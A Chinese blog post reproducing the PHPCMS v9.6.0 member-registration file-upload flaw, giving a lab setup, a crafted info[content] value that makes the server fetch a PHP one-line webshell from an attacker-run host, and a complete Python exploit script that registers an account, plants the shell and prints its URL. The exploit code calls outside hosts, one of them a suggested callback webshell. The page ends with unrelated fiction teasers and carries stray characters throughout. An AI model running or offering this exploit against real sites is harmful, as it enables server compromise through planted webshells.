PHPCMS v9.6.0 文件上傳漏洞復現

0x01 漏洞環(huán)境

攻擊機:Windows10:192.168.10.21。
服務機:Kali Linux 2017.01 amd 64:192.168.10.68(提供 web shell 文件下載)。
靶機:Redhat Enterprise 7.3 x64:192.168.10.44(靶機運行 PHPCMS 9.6.0 Web 服務)内颗。

0x02 利用過程

Kali Linux Python 命令python -mSimpleHTTPServer 80 開啟簡易 Web 服務器越妈,提供 shell(PHP 一句話木馬)資源下載檩赢。

Kali 搭建 Shell 資源下載服務器.png

打開 PHPCMS v9.6 注冊頁面:http://192.168.10.44/index.php?m=member&c=index&a=register&siteid=1闪盔,進行注冊操作并利用 Burp Suite 進行截取數據包结序。修改其中的參數:modelid障斋,infodosubmit徐鹤。詳細修改參數如下:modelid=11 info[content]=<img src=http://192.168.10.68/shell.txt?.php#.jpg> dosubmit=1

提交 POST 數據包獲取 Shell

提交數據包后將獲得 Web Shell 的 URL 路徑:獲得shell:http://192.168.10.44/uploadfile/2017/0511/20170511074521592.php垃环。

0x03 Exp

# -*- coding:utf-8 -*-

'''
----------------------
Author : Akkuman
Blog   : hacktech.cn
----------------------
'''

import requests
import sys
from random import Random

chars = 'qwertyuiopasdfghjklzxcvbnm0123456789'

def main():
    if len(sys.argv) < 2:
        print("[*]Usage   : Python 1.py http://xxx.com")
        sys.exit()
    host = sys.argv[1]
    url = host + "/index.php?m=member&c=index&a=register&siteid=1"

    data = { # 構建POST數據包
        "siteid": "1",
        "modelid": "1",
        "username": "xianjian",
        "password": "123456",
        "email": "xianjian@qq.com",
        # 如果想使用回調的可以使用http://file.codecat.one/oneword.txt,一句話地址為.php后面加上e=YXNzZXJ0
        "info[content]": "<img src=http://203.67.242.54/any.txt?.php#.jpg>",
        "dosubmit": "1",
        "protocol": "",
    }
    try:
        rand_name = chars[Random().randint(0, len(chars) - 1)]
        data["username"] = "xianjian_%s" % rand_name
        data["email"] = "xianjian_%s@qq.com" % rand_name
        
        htmlContent = requests.post(url, data=data)

        successUrl = ""
        if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:
            successUrl = htmlContent.text[htmlContent.text.index("http"):htmlContent.text.index(".php")] + ".php"
            print("[*]Shell  : %s" % successUrl)
        if successUrl == "":
            print("[x]Failed : had crawled all possible url, but i can't find out it. So it's failed.\n")

    except:
        print("Request Error")

if __name__ == '__main__':
    main()

0x04 源碼分析

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
  • 序言:七十年代末返敬,一起剝皮案震驚了整個濱河市遂庄,隨后出現的幾起案子,更是在濱河造成了極大的恐慌劲赠,老刑警劉巖涛目,帶你破解...
    沈念sama閱讀 217,907評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現場離奇詭異凛澎,居然都是意外死亡霹肝,警方通過查閱死者的電腦和手機,發(fā)現死者居然都...
    沈念sama閱讀 92,987評論 3 395
  • 文/潘曉璐 我一進店門塑煎,熙熙樓的掌柜王于貴愁眉苦臉地迎上來沫换,“玉大人,你說我怎么就攤上這事最铁⊙渡停” “怎么了垮兑?”我有些...
    開封第一講書人閱讀 164,298評論 0 354
  • 文/不壞的土叔 我叫張陵,是天一觀的道長漱挎。 經常有香客問我甥角,道長,這世上最難降的妖魔是什么识樱? 我笑而不...
    開封第一講書人閱讀 58,586評論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮震束,結果婚禮上怜庸,老公的妹妹穿的比我還像新娘。我一直安慰自己垢村,他們只是感情好割疾,可當我...
    茶點故事閱讀 67,633評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著嘉栓,像睡著了一般宏榕。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上侵佃,一...
    開封第一講書人閱讀 51,488評論 1 302
  • 那天麻昼,我揣著相機與錄音,去河邊找鬼馋辈。 笑死抚芦,一個胖子當著我的面吹牛,可吹牛的內容都是我干的迈螟。 我是一名探鬼主播叉抡,決...
    沈念sama閱讀 40,275評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼答毫!你這毒婦竟也來了褥民?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 39,176評論 0 276
  • 序言:老撾萬榮一對情侶失蹤洗搂,失蹤者是張志新(化名)和其女友劉穎消返,沒想到半個月后,有當地人在樹林里發(fā)現了一具尸體蚕脏,經...
    沈念sama閱讀 45,619評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡侦副,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,819評論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現自己被綠了驼鞭。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片秦驯。...
    茶點故事閱讀 39,932評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖挣棕,靈堂內的尸體忽然破棺而出译隘,到底是詐尸還是另有隱情亲桥,我是刑警寧澤,帶...
    沈念sama閱讀 35,655評論 5 346
  • 正文 年R本政府宣布固耘,位于F島的核電站题篷,受9級特大地震影響,放射性物質發(fā)生泄漏厅目。R本人自食惡果不足惜番枚,卻給世界環(huán)境...
    茶點故事閱讀 41,265評論 3 329
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望损敷。 院中可真熱鬧葫笼,春花似錦、人聲如沸拗馒。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,871評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽诱桂。三九已至洋丐,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間挥等,已是汗流浹背友绝。 一陣腳步聲響...
    開封第一講書人閱讀 32,994評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留肝劲,地道東北人九榔。 一個月前我還...
    沈念sama閱讀 48,095評論 3 370
  • 正文 我出身青樓,卻偏偏與公主長得像涡相,于是被迫代替她去往敵國和親哲泊。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,884評論 2 354

推薦閱讀更多精彩內容